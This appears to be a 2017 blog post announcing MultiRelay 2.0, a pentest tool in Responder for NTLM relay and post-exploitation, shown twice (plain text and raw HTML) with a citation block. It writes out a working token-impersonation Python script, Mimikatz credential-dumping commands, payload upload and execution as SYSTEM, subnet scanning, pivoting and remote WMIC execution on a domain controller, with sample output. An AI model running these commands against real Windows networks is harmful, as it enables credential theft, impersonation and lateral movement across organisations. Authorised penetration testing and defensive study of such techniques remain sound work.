MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.

Introduction:

If you haven’t read the initial MultiRelay introduction post, I strongly invite you to read it.

MultiRelay Description:

MultiRelay 2.0 is a powerful -professional grade- pentest utility included in Responder’s tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay and post exploitation on a selected target.

New Functionalities:

Several new functionalities were added to the MultiRelay shell interface, those are listed below:

Upload a file on the target:
Using the “upload” command, a user can push any file using the SMB protocol on the compromised target. The file will be uploaded in c:\Windows\Temp\

Delete a file on the target:
Using the “delete” command, a user can delete any file using the SMB protocol on the compromised target. If the file has been successfully deleted, no errors will be shown.

Run a command as the currently logged in user:
Using the “runas” command, a user will be able to launch a service which will run a command as the currently logged in user.

Pivot to another host, using the currently logged in user’s sets of credentials.
Using the “pivot” command, a user will attempt to propagate to another host (Lateral movement).

Run remote Mimikatz (32-bit, 64-bit) RPC commands:
Using the “mimi” or “mimi32” command, the user will be able to interact with mimikatz RPC on the target.

Scan the current /24 or /16 in order to find other hosts to pivot to:
When using the “scan /24” command, a user will be able to scan the entire class C and chose another host to pivot to.

Run a local command on the local system:
Any other command will launch a service which will run a command as LocalSystem.

Since the previous version 2 new options were added:

-c Run a command as system then exit (scripting).
-d Dump the SAM database then exit (scripting).

Good Things To Know:

All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/
Filenames for these binaries are specified in MultiRelay.py, starting at line 48:
MimikatzFilename    = “./MultiRelay/bin/mimikatz.exe”
Mimikatzx86Filename = “./MultiRelay/bin/mimikatz_x86.exe”
RunAsFileName       = “./MultiRelay/bin/Runas.exe”
SysSVCFileName      = “./MultiRelay/bin/Syssvc.exe”
Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py.
The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you’ll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.
If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$
Think about the command you’re about to launch before launching it. Uploading your custom version of mimikatz and running “mimikatz” will keep the process hanging and you wont be able to delete the file unless you’re using taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section.

NTLM Relay Lateral Movement:

MultiRelay philosophy is that any successful NTLM Relay is precious and everything should be done to keep that SMB connection alive.

Getting command execution via NTLM Relay is commonly achieved via SVCCTL:

Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.

While running commands as SYSTEM is cool, you can’t do much on the network with this user, meaning that you cannot access other network resources with a local system account.
This limits the compromise to only one host at the time, and you might wait a long time before another administrator hash flies over the wire…

While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a 5 lines python script (Runas.py) which impersonate a logged in user:

import sys, win32ts, win32process, win32con

SessionID = win32ts.WTSGetActiveConsoleSessionId()
UserToken = win32ts.WTSQueryUserToken(SessionID)
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, “c:\\Windows\\system32\\cmd.exe”, “/c “+’ ‘.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())

As stated in WTSGetActiveConsoleSessionId MSDN documentation
WTSGetActiveConsoleSessionId “Retrieves the session identifier of the console session. The console session is the session that is currently attached to the physical console. Note that it is not necessary that Remote Desktop Services be running for this function to succeed“.
Once we have the session ID, we use the WTSQueryUserToken function to retrieve the Token associated with the previously acquired Session ID, and call
CreateProcessAsUser with our command.

In short, we’re able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind NTLM Relay attack vector: Propagation and mass compromises resulting from 1 relayed authentication.

Teaming up with @gentilkiwi:

Earlier versions of MultiRelay used this python script compiled with pyinstaller which generated a pretty big file from a 5 python lines script… @gentilkiwi jumped in and said “I think I can do way better”, and he did.
@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options, the ability to run mimikatz as a service and he also took care of bringing Runas.exe to a decent size of 9k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities.

These new Mimikatz functionalities allows MultiRelay to interact stealthily with Mimikatz and use without restriction all of the power this awesome tool gives us.

MultiRelay 2.0 Wushu:

Below are listed some post exploitation attack examples:

Mimikatz RPC:
Get all available token, impersonate one user and run a command as this user:
- C:\Windows\system32\:#mimi token::list
- C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run
- C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami
Get all logon passwords:
- mimi sekurlsa::logonpasswords
Etc, all regular mimikatz commands are available on the RPC interface
Upload your custom mimikatz or payload and run it:
Upload an executable and launch it from Windows/Temp/ as system.
- C:\Windows\system32\:#upload path/to/mimikatz.exe
- C:\Windows\system32\:#%windir%\Temp\mimikatz.exe “sekurlsa::logonpasswords” exit
The exit command is very important with mimikatz, if you don’t use it mimikatz will stay loaded and the command will fail.
Note: If you need to run your executable as the currently logged in user, use:
- C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args
Now delete the file:
- C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe
Scan the current class C and pivot to another host:
- C:\Windows\system32\:#scan /24
  
  …[snip]…
  [‘192.168.1.141′, Os:’Windows Server 2016 Standard 14393′, Domain:’SMB3′, Signing:’True’]
  [‘192.168.1.142′, Os:’Windows Server 2012 R2 Datacenter 9600′, Domain:’SMB3′, Signing:’False’]
  [‘192.168.1.144′, Os:’Windows 5.1′, Domain:’SMB3′, Signing:’False’]
  [‘192.168.1.145′, Os:’Windows Server 2012 R2 Datacenter 9600′, Domain:’SMB3′, Signing:’False’]
  …[snip]…
- C:\Windows\system32\:#pivot 192.168.1.145
  
  [+] Pivoting to 192.168.1.145.
  Connected to 192.168.1.145 as LocalSystem.
Run a command as the currently logged in user:
- C:\Windows\system32\:#runas whoami
  
  smb3\lgandx
Execute commands on the PDC remotely and read the output:
- Mount the PDC C:\ drive:
- C:\Windows\system32\:#runas net use g: \\smb3.local\c$
  
  The command completed successfully.
- C:\Windows\system32\:#runas wmic /node:smb3.local process call create “cmd /c whoami^>c:\results.txt”
  
  Executing (Win32_Process)->Create()
  Method execution successful.
  Out Parameters:
  instance of __PARAMETERS
  {
  ProcessId = 1068;
  ReturnValue = 0;
  };
- Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt
- C:\Windows\system32\:#runas more g:\results.txt
  
  smb3\lgandx
These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment, for the rest it’s up to your imagination.

Final Words: The donation campaign

I work as an independent contractor/pentester and I get pretty busy these days. When I work on Responder, I end up working for free for the community and losing money I could make with my contracts, especially when a set of new functionalities or research takes up to a month, full time.

Therefore a donation campaign was launched a few month ago in order to get some funding for this project, and I think it was a success. More than 50 pentesters around the world and 3 companies donated to this project, therefore supporting the development of this set of free tools used in your everyday internal pentests.

I would like to thank all the independent penetration testers who donated and these 3 companies:

SecureWorks : https://www.secureworks.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

And all, ALL the pentesters around the world who donated to this project.

Your donations made this version happen.

Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:
https://github.com/lgandx/Responder

Happy hacking!

Print Share Comment Cite Upload Translate

APA

() » MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.. Retrieved from https://www.truth.cx/2017/03/31/multirelay-2-0-runas-pivot-svc-and-mimikatz-love/.

MLA

" » MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.." - , https://www.truth.cx/2017/03/31/multirelay-2-0-runas-pivot-svc-and-mimikatz-love/

HARVARD

» MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.., viewed ,

VANCOUVER

- » MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2017/03/31/multirelay-2-0-runas-pivot-svc-and-mimikatz-love/

CHICAGO

" » MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.." - Accessed . https://www.truth.cx/2017/03/31/multirelay-2-0-runas-pivot-svc-and-mimikatz-love/

IEEE

" » MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.." [Online]. Available: https://www.truth.cx/2017/03/31/multirelay-2-0-runas-pivot-svc-and-mimikatz-love/. [Accessed: ]

Select a language:

<div dir="ltr" style="text-align: left;" trbidi="on"><div><br /><h3 style="text-align: left;">Introduction: </h3><div style="text-align: left;">If you haven't read the <a href="http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html" >initial MultiRelay introduction post</a>, I strongly invite you to read it. </div><div style="text-align: left;"><br /></div><h3 style="text-align: left;">MultiRelay Description:</h3><div style="text-align: left;">MultiRelay 2.0 is a powerful -professional grade- pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay and post exploitation on a selected target.</div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"><br /></div><h3 style="text-align: left;"> New Functionalities: </h3><div style="text-align: left;">Several new functionalities were added to the MultiRelay shell interface, those are listed below:</div><ul style="text-align: left;"><li>Upload a file on the target:<br />Using the "upload" command, a user can push any file using the SMB  protocol on the compromised target. The file will be uploaded in  c:\Windows\Temp\</li></ul><ul style="text-align: left;"><li>Delete a file on the target:<br />Using the "delete" command, a user can delete any file using the SMB  protocol on the compromised target. If the file has been successfully  deleted, no errors will be shown.</li></ul><ul style="text-align: left;"><li>Run a command as the currently logged in user:<br />Using the "runas" command, a user will be able to launch a service  which will run a command as the currently logged in user.</li></ul><ul style="text-align: left;"><li>Pivot to another host, using the currently logged in user's sets of credentials.<br />Using the "pivot" command, a user will attempt to propagate to another host (Lateral movement).</li></ul><ul style="text-align: left;"><li>Run remote Mimikatz (32-bit, 64-bit) RPC commands:<br />Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.</li></ul><ul style="text-align: left;"><li>Scan the current /24 or /16  in order to find other hosts to pivot to:<br />When using the "scan /24" command, a user will be able to scan the entire class C and chose another host to pivot to. </li></ul><ul style="text-align: left;"><li>Run a local command on the local system:<br />Any other command will launch a service which will run a command as LocalSystem.</li></ul><br /><div style="text-align: left;">Since the previous version 2 new options were added:</div><ul style="text-align: left;"><li>-c Run a command as system then exit (scripting).<br /> </li><li>-d Dump the SAM database then exit (scripting).</li></ul><div style="text-align: left;"><br /></div><h3 style="text-align: left;">Good Things To Know:</h3><ul style="text-align: left;"><li><span style="font-weight: normal;">All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/ <br /> </span></li><li><span style="font-weight: normal;">Filenames for these binaries are specified in MultiRelay.py, starting at line 48:<br />MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"<br />Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"<br />RunAsFileName       = "./MultiRelay/bin/Runas.exe"<br />SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"<br /></span></li><li><span style="font-weight: normal;">Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py.<br /></span></li><li><span style="font-weight: normal;">The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.<br /></span></li><li><span style="font-weight: normal;">If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$<br /></span></li><li><span style="font-weight: normal;">Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging and you wont be able to delete the file unless you're using taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section. <br /></span></li></ul><h3 style="text-align: left;">NTLM Relay Lateral Movement:</h3><div style="text-align: left;">MultiRelay philosophy is that any successful NTLM Relay <a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" >is precious and everything should be done to keep that</a><a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" > </a><a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" >SMB connection alive.</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Getting command execution via NTLM Relay is commonly achieved via SVCCTL:</div><ul style="text-align: left;"><li>Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.</li></ul><div style="text-align: left;">While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account. <br />This limits the compromise to only one host at the time, and you might wait a long time before another administrator hash flies over the wire...</div><div style="text-align: left;">While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a 5 lines python script (Runas.py) which impersonate  a logged in user:<br /><br /></div><blockquote class="tr_bq"><div style="text-align: left;">import sys, win32ts, win32process, win32con<br /><br />SessionID = win32ts.WTSGetActiveConsoleSessionId()<br />UserToken = win32ts.WTSQueryUserToken(SessionID)<br />h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())</div><blockquote class="tr_bq"><br /></blockquote></blockquote><div style="text-align: left;">As stated in <a href="https://msdn.microsoft.com/en-us/library/aa383835(v=vs.85).aspx" >WTSGetActiveConsoleSessionId MSDN documentation</a><br />WTSGetActiveConsoleSessionId "Retrieves the session identifier of the console session. The console  session is the session that is currently attached to the physical  console. Note that <u>it is not necessary that Remote Desktop Services be  running for this      function to succeed</u>".<br />Once we have the session ID, we use the <a href="https://msdn.microsoft.com/en-us/library/aa383840(v=vs.85).aspx" >WTSQueryUserToken</a> function to retrieve the Token associated with the previously acquired Session ID, and call <br /><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682429(v=vs.85).aspx" >CreateProcessAsUser</a> with our command.</div><div style="text-align: left;">In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind NTLM Relay attack vector: Propagation and mass compromises resulting from 1 relayed authentication.</div><h4 style="text-align: left;">Teaming up with @gentilkiwi:</h4><div style="text-align: left;">Earlier versions of MultiRelay used this python script compiled with pyinstaller which generated a pretty big file from a 5 python lines script... <a href="https://twitter.com/gentilkiwi" >@gentilkiwi</a> jumped in and said "I think I can do way better", and he did.<br />@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options, the ability to run mimikatz as a service and he also took care of bringing Runas.exe to a decent size of 9k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities.</div><div style="text-align: left;"><br />These new Mimikatz functionalities allows MultiRelay to interact stealthily with Mimikatz and use without restriction all of the power this awesome tool gives us. </div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><h3 style="text-align: left;"> </h3><h3 style="text-align: left;">MultiRelay 2.0 Wushu: </h3><div style="text-align: left;">Below are listed some post exploitation attack examples:</div><ul style="text-align: left;"><li>Mimikatz RPC:<br />Get all available token, impersonate one user and run a command as this user:<br /><ul><li>C:\Windows\system32\:#mimi token::list  </li><li>C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run</li></ul><ul><li>C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami</li></ul>Get all logon passwords:<br /><ul><li>mimi sekurlsa::logonpasswords</li></ul>Etc, all regular mimikatz commands are available on the RPC interface<br /></li><li>Upload your custom mimikatz or payload and run it:<br />Upload an executable and launch it from Windows/Temp/ as system. <br /><ul><li> C:\Windows\system32\:#upload path/to/mimikatz.exe</li><li> C:\Windows\system32\:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit  </li></ul><u>The exit command is very important</u> with mimikatz, if you don't use it mimikatz will stay loaded and <u>the command will fail</u>.<br />Note: If you need to run your executable as the currently logged in user, use:<ul><li>C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args</li></ul>Now delete the file:<br /><ul><li>C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe</li></ul>   </li><li>Scan the current class C and pivot to another host:<br /><ul><li>C:\Windows\system32\:#scan /24<blockquote class="tr_bq">...[snip]...<br />['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']<br />['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']<br />['192.168.1.145', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />...[snip]...</blockquote></li></ul><ul><li> C:\Windows\system32\:#pivot 192.168.1.145<br /><blockquote class="tr_bq">[+] Pivoting to 192.168.1.145.<br />Connected to 192.168.1.145 as LocalSystem.</blockquote></li></ul></li><li>Run a command as the currently logged in user:<br /><ul><li>C:\Windows\system32\:#runas whoami<blockquote class="tr_bq">smb3\lgandx </blockquote></li></ul></li><li>Execute commands on the PDC remotely and read the output:<br /><ul><li>Mount the PDC C:\ drive:</li><li>C:\Windows\system32\:#runas net use g: \\smb3.local\c$<br /><blockquote class="tr_bq">The command completed successfully.</blockquote></li><li>C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"<blockquote class="tr_bq">Executing (Win32_Process)->Create()<br />Method execution successful.<br />Out Parameters:<br />instance of __PARAMETERS<br />{<br />ProcessId = 1068;<br />ReturnValue = 0;<br />};</blockquote></li></ul><ul><li>Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example:  whoami^>c:\results.txt</li><li>C:\Windows\system32\:#runas more g:\results.txt<br /><blockquote class="tr_bq">smb3\lgandx </blockquote></li></ul><br />These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment, for the rest it's up to your imagination.<br /><br /></li></ul><h3>Final Words: The donation campaign</h3>I work as an independent  contractor/pentester and I get pretty busy these days. When I work on  Responder, I end up working for free for the community and losing money I  could make with my contracts, especially when a set of new  functionalities or research takes up to a month, full time.<br />  <br />Therefore  a donation campaign was launched a few month ago in order to get some  funding for this project, and I think it was a success. More than 50  pentesters around the world and 3 companies donated to this project,  therefore supporting the development of this set of free tools used in  your everyday internal pentests.<br /><br />I would like to thank all the independent penetration testers who donated and these 3 companies:<br /><ul><li>SecureWorks : <a href="https://www.secureworks.com/">https://www.secureworks.com/</a></li></ul><ul><li>Black Hills Information Security: <a href="http://www.blackhillsinfosec.com/">http://www.blackhillsinfosec.com/</a></li></ul><ul><li>TrustedSec: <a href="https://www.trustedsec.com/">https://www.trustedsec.com/</a></li></ul>And all, ALL the pentesters around the world who donated to this project.</div><div>Your donations made this version happen.</div><div></div><div>Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:<br /><a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a></div><div><br /></div><div>Happy hacking!</div></div>

First name:

Last name: